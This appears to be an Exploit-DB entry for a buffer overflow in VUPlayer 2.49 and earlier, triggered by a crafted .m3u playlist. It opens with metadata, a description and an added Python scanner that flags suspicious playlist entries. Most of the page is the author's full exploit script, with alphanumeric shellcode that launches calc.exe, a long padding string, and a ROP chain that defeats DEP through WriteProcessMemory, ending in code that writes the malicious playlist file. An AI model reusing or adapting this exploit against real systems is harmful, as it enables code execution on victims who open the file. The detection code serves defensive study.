Vendor: VUPlayer
By: mr_me
CVSS: 7.5 (HIGH)
Vulnerability Type: Buffer Overflow
CWE: Unknown
Product Name: VUPlayer
Affected Version From: 2.49 and earlier
Affected Version To: 2.49 and earlier
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3

VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/ DEP bypass

This exploit takes advantage of a buffer overflow in VUPlayer version 2.49 and earlier when it parses an .m3u playlist file. A user who opens a crafted playlist ends up executing attacker-supplied code with the permissions of the user running the vulnerable software, even with DEP set to AlwaysOn. The exploit includes a shellcode payload that opens the Windows calculator application (calc.exe) as a proof of concept.

Mitigation:

Upgrade to a patched version of VUPlayer (2.50 or later).
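Added example for the defensive side, not part of the Exploit-DB entry or mr_me's script: the trigger the script builds is a single playlist entry of "HTTP://" followed by roughly a thousand bytes of filler, with binary ROP and shellcode bytes appended. A playlist file that looks like that is easy to spot before it reaches a media player, so the scanner below parses .m3u content, skips directive lines, and flags entries that are abnormally long, contain non-printable bytes, or are dominated by one repeated byte. The 512-byte threshold, the 80% padding ratio, and both sample playlists are constructed for this example.

```python
# Added example (not from the Exploit-DB entry): triage scanner for .m3u
# playlists. Flags entries that look like overflow padding and appended
# binary payload rather than a real path or URL. Thresholds are assumptions.
from collections import Counter
from typing import Dict, List

MAX_ENTRY_LEN = 512                       # assumption: real paths/URLs are shorter
PADDING_RATIO = 0.8                       # assumption: one byte making up >=80% of an entry
PRINTABLE = set(range(0x20, 0x7F)) | {0x09}


def parse_m3u(data: bytes) -> List[Dict]:
    """Split an .m3u file into media entries, keeping 1-based line numbers.

    Lines beginning with '#' are directives or comments (#EXTM3U, #EXTINF, ...)
    and are not media entries; blank lines are skipped as well.
    """
    entries = []
    for lineno, raw in enumerate(data.splitlines(), start=1):
        line = raw.rstrip(b"\r")
        if not line.strip() or line.lstrip().startswith(b"#"):
            continue
        entries.append({"line": lineno, "entry": line})
    return entries


def scan_m3u(data: bytes, max_len: int = MAX_ENTRY_LEN) -> List[Dict]:
    """Return one finding per suspicious entry; an empty list means nothing flagged."""
    findings = []
    for ent in parse_m3u(data):
        entry = ent["entry"]
        reasons = []
        if len(entry) > max_len:
            reasons.append(f"entry length {len(entry)} exceeds {max_len}")
        bad = sum(1 for b in entry if b not in PRINTABLE)
        if bad:
            reasons.append(f"{bad} non-printable bytes (possible ROP chain or shellcode)")
        # Overflow filler is typically one byte repeated many times.
        if len(entry) >= 64:
            _, top = Counter(entry).most_common(1)[0]
            if top / len(entry) >= PADDING_RATIO:
                reasons.append("one byte dominates the entry (looks like padding)")
        if reasons:
            findings.append({"line": ent["line"], "length": len(entry), "reasons": reasons})
    return findings


# Constructed sample playlists: one ordinary, one shaped like the trigger
# described on this page (long HTTP:// entry plus a couple of binary bytes).
BENIGN = (b"#EXTM3U\n"
          b"#EXTINF:215,Artist - Track\n"
          b"http://example.invalid/music/track01.mp3\n")
SUSPICIOUS = b"#EXTM3U\n" + b"HTTP://" + b"A" * 1005 + b"\xff\xfe" + b"\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        hits = scan_m3u(sample)
        print(f"{name}: {'clean' if not hits else ''}")
        for hit in hits:
            print(f"  line {hit['line']} ({hit['length']} bytes): " + "; ".join(hit["reasons"]))
```

Run it against a directory of quarantined playlists, or wire `scan_m3u` into a mail-gateway or sandbox pre-filter; the length check alone is enough to catch this particular trigger, while the byte-diversity and non-printable checks give coverage for variants that shorten the filler.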

Exploit-DB raw data:

#!/usr/bin/env python
#
# VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/ DEP bypass
# Author: mr_me
# Download: http://vuplayer.com/
# Tested on Wind0ws XP SP3 /noexecute=alwayson
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# 
# DEP AlwaysOn bypass version
# Thanks to Sud0 & Lincoln, for the motivation to learn this :-)
# 

# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41");

crash = "HTTP://" + "\x41" * 1005

rop = "\xd3\x72\x60\x10" # POPAD # JE SHORT BASSMIDI.10607337		: 0x106072D3 
rop += "\x2f\x10\x60\x10" # POP EDI # MOV EAX,ESI # POP ESI # RETN	: 0x1060102F
rop += "\x13\x22\x80\x7c" # @ of WriteProcessMemory()				: 0x7C802213
rop += "\xcf\x22\x80\x7c" # Address to patched in kernel32			: 0x7C8022CF
rop += "\x44\x44\x44\x44" # JUNK									: 0x44444444
rop += "\xff\xff\xff\xff" # start @ -1 for shellcode size			: 0xffffffff
rop += "\x15\x10\x10\x10" # This @ from .data segment of app dll	: 0x10101015 
rop += "\x44\x44\x44\x44" # JUNK									: 0x44444444
rop += "\x44\x44\x44\x44" # JUNK									: 0x44444444
rop += "\x44\x44\x44\x44" # JUNK									: 0x44444444
rop += "\x79\x21\x60\x10" # POP EDI # POP ESI # RETN				: 0x10602179
rop += "\x88\x71\x60\x10" # CALL EAX								: 0x10607188
rop += "\xff\xff\xff\xff" # -hProcess argv[1]						: 0xffffffff

# Get the length of shellcode - @ from kernel32
rop += "\x6f\x10\x81\x7c" * 305 # INC EBX # RETN					: 0x7C81106F

# push all args on the stack for WPM() - @ from shell32.dll
rop += "\xf9\x18\xa1\x7c" # PUSHAD # RETN							: 0x7CA118F9

buffer = crash + rop + sc

print "[+] Building .m3u file"
file = open('cst-vuplayer.m3u','w');
file.write(buffer);
file.close();
print "[+] Done"